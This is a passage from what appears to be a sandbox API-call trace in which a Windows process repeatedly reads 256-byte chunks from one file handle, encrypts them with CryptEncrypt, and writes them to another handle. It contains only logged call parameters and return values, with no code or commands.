hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.343] GetLastError () returned 0x0 [0163.343] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.343] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.343] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.344] GetLastError () returned 0x0 [0163.344] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.344] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.344] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.344] GetLastError () returned 0x0 [0163.344] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.344] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.344] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.344] GetLastError () returned 0x0 [0163.344] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.344] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.344] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.344] GetLastError () returned 0x0 [0163.344] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.344] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.344] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.344] GetLastError () returned 0x0 [0163.344] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.344] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.344] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.344] GetLastError () returned 0x0 [0163.344] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.344] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.344] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.344] GetLastError () returned 0x0 [0163.344] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.345] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.345] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.345] GetLastError () returned 0x0 [0163.345] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.345] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.345] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.345] GetLastError () returned 0x0 [0163.345] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.345] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.345] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.345] GetLastError () returned 0x0 [0163.345] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.345] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.345] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.345] GetLastError () returned 0x0 [0163.345] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.345] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.345] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.345] GetLastError () returned 0x0 [0163.345] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.345] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.345] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.345] GetLastError () returned 0x0 [0163.345] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.345] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.346] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.346] GetLastError () returned 0x0 [0163.346] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.346] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.346] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.346] GetLastError () returned 0x0 [0163.346] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.346] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.346] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.346] GetLastError () returned 0x0 [0163.346] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.346] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.346] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.346] GetLastError () returned 0x0 [0163.350] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.351] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.351] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.351] GetLastError () returned 0x0 [0163.351] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.351] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.351] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.351] GetLastError () returned 0x0 [0163.352] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.352] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.352] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.352] GetLastError () returned 0x0 [0163.352] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.352] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.352] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.352] GetLastError () returned 0x0 [0163.352] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.352] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.352] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.352] GetLastError () returned 0x0 [0163.352] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.352] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.352] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.352] GetLastError () returned 0x0 [0163.352] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.352] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.352] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.352] GetLastError () returned 0x0 [0163.352] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.352] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.352] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.352] GetLastError () returned 0x0 [0163.352] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.353] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.353] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.353] GetLastError () returned 0x0 [0163.353] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.353] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.353] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.353] GetLastError () returned 0x0 [0163.353] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.353] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.353] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.353] GetLastError () returned 0x0 [0163.353] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.353] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.353] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.353] GetLastError () returned 0x0 [0163.353] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.353] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.353] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.353] GetLastError () returned 0x0 [0163.353] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.353] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.353] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.353] GetLastError () returned 0x0 [0163.354] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.354] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.354] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) 